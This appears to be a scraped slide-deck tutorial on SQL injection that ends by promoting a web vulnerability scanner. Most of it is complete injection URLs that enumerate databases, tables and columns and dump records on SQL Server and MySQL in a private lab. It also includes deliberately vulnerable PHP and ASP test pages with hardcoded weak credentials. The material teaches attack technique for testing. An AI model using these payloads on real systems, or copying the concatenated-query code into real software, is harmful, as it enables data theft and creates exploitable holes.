    SQL Injection Tutorial Time delay (To produce time-consuming SQL sentence and get information from the response time). In example 1, response of http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0 include the database name “test”, so you can get data by plain text error. In example 2, response of http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select char(65,65,65),1%23 include “AAA” (char(65,65,65)), so you can get data by Union replace. 2.2 Get Data by SQL Injection 2.2.1 Get Dabase Name Example 1: Get Current Database: http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
  • 9.
    SQL Injection Tutorial GetAll Databases: Get Database Number: 10 http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [master]..[sysdatabases]) as varchar(8))))>0 Get each database name: master, tempdb, etc. by changing the value of dbid. http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases] where dbid=1))>0 http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases] where dbid=2))>0 Example 2:
  • 10.
    SQL Injection Tutorial GetCurrent Database: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select database(),1 %23 Get All Databases: Get databases number: 18 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(SCHEMA_NAME) from information_schema.SCHEMATA) as char)),1 %23 Get each database: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select SCHEMA_NAME,1 from information_schema.SCHEMATA limit 0,1%23 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select SCHEMA_NAME,1 from information_schema.SCHEMATA limit 17,1%23
  • 11.
    SQL Injection Tutorial 2.2.2Get Table Name Example 1: Get Table Number: 6 http://192.168.254.21:79/sql.asp?uid=1 and char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test]..[sysobjects] where xtype=0x55) as varchar(8)))>0 Get each table: http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 1 id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0 … http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 4 id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0 Example 2: Get Table Number: 5 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=char(116,101,115,116)) as
  • 12.
    SQL Injection Tutorial char)),1%23 Get each table: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select TABLE_NAME,1 from information_schema.tables where TABLE_SCHEMA=char(116,101,115,116) limit 2,1%23 2.2.3 Get Column Name Example 1, Get Column Number of table „t1‟: 3 http://192.168.254.21:79/sql.asp?uid=1 and char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test].information_schema.columns where table_name=0x74003100) as varchar(8)))>0
  • 13.
    SQL Injection Tutorial Geteach column: http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from [Test].information_schema.columns where table_name=0x74003100 and ordinal_position=1)>0 http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from [Test].information_schema.columns where table_name=0x74003100 and ordinal_position=2)>0 Example 2: Get column number: 2 http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49)) as char)),1 %23
  • 14.
    SQL Injection Tutorial Geteach column: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select COLUMN_NAME,1 from information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49) limit 0,1%23 2.2.4 Get Data Record Example 1, http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32)) from (select top 1 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by [username] desc)>0
  • 15.
    SQL Injection Tutorial http://192.168.254.21:79/sql.asp?uid=1and (select top 1 isnull(cast([username] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32)) from (select top 2 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by [username] desc)>0 Example 2: http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat_ws(char(94),ifnull(cast(`user` as char),char(32)),ifnull(cast(`des` as char),char(32))),1 from test.t1 limit 4,1%23 2.3 SQL Injection Tool This SQL Injection Tutorial describes how to use SQL Injection manually, but it is inefficient step by step. An automatic SQL Injection Scanner and SQL Injection Tool are preferred. WebCruiser Web Vulnerability Scanner is such an effective penetration testing tool for you.
  • 16.
    SQL Injection Tutorial WebCruiser- Web Vulnerability Scanner, an effective and powerful web penetration testing tool that will aid you in auditing your website! It has a Vulnerability Scanner and a series of security tools include SQL Injection Tool, Cross Site Scripting Tool, XPath Injection Tool etc. WebCruiser can support scanning website as well as POC (Proof of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting tool! Key Features: * Crawler (Site Directories and Files); * Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.; * SQL Injection Scanner; * SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept); * SQL Injection for SQL Server: PlainText/Union/Blind Injection; * SQL Injection for MySQL: PlainText/Union/Blind Injection; * SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection; * SQL Injection for DB2: Union/Blind Injection;
  • 17.
    SQL Injection Tutorial *SQL Injection for Access: Union/Blind Injection; * Post Data Resend; * Cross Site Scripting Scanner and POC; * XPath Injection Scanner and POC; * Auto Get Cookie From Web Browser For Authentication; * Report Output. System Requirement: Windows 7/Vista, or Windows XP with .Net Framework 2.0 Download WebCruiser from http://sec4app.com or http://www.janusec.com . 3 Build Typical Test Environment 3.1 PHP+MySQL Test Environment XAMPP (http://sourceforge.net/projects/xampp/) will help you build a PHP+MySQL environment simply. Create database `test` and table `t1` and add records, here is the description:
  • 18.
    SQL Injection Tutorial Createa file named mysql.php: <?php $username=$_GET['username']; if($username) { $conn=mysql_connect("127.0.0.1","root","123456") or die('Error: ' . mysql_error()); mysql_select_db("test"); $SQL="select * from t1 where user='".$username."'"; //echo "SQL=".$SQL."<br>"; $result=mysql_query($SQL) or die('Error: ' . mysql_error());; $row=mysql_fetch_array($result); if($row['user']) { echo "Username:".$row['user']."<br>"; echo "Description:".$row['des']."<br>"; echo "TestOK!<br>"; } else echo "No Record!"; mysql_free_result($result); mysql_close(); } ?> Place mysql.php to the folder htdocs and navigate
  • 19.
    SQL Injection Tutorial http://192.168.254.21/mysql.php?username=bob 3.2ASP/ASPX+SQL Server Test Environment Create database test and table t1: Create sql.asp: <script language=javascript runat=server> var dbConn = Server.CreateObject("ADODB.Connection"); dbConn.open("Provider=sqloledb;Data Source=localhost;Initial Catalog=test;User Id=sa;Password=123456;" ); rs = Server.CreateObject("ADODB.RecordSet"); uid= Request.Querystring("uid"); rs.open("select * from t1 where uid="+uid,dbConn,3); Response.write("<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>Test</title></head>"); if(rs.RecordCount < 1) { Response.write("<p>No Record!</p>"); } else {
  • 20.
    SQL Injection Tutorial Response.write("<tableborder=1 width=800 cellspacing=0 bordercolordark=009099>"); Response.write("<tr><td><b>uid</b></td><td><b>username</b></td><td><b>Description</b></td>"); for(var i = 1;i <= rs.RecordCount;i++) { if(!rs.Eof) { Response.write("<tr>"); Response.write("<td><span style='font-size:9t'>"+rs("uid")+"</span></td>"); Response.write("<td><span style='font-size:9t'>"+rs("username")+"</span></td>"); Response.write("<td><span style='font-size:9t'>"+rs("des")+"</span></td>"); Response.write("</tr>"); rs.MoveNext(); } } } Response.write("</html>"); rs.close(); dbConn.close(); </script> Navigate http://192.168.254.21:79/sql.asp?uid=1
  • 21.
    SQL Injection Tutorial 4References 1. SQL Injection, http://sec4app.com/download/SqlInjection.pdf 2. WebCruiser Web Vulnerability Scanner User Guide, http://sec4app.com/download/WebCruiserUserGuide.pdf 3. Janus Security Software, http://www.janusec.com/ 4. WebCruiser, http://sec4app.com/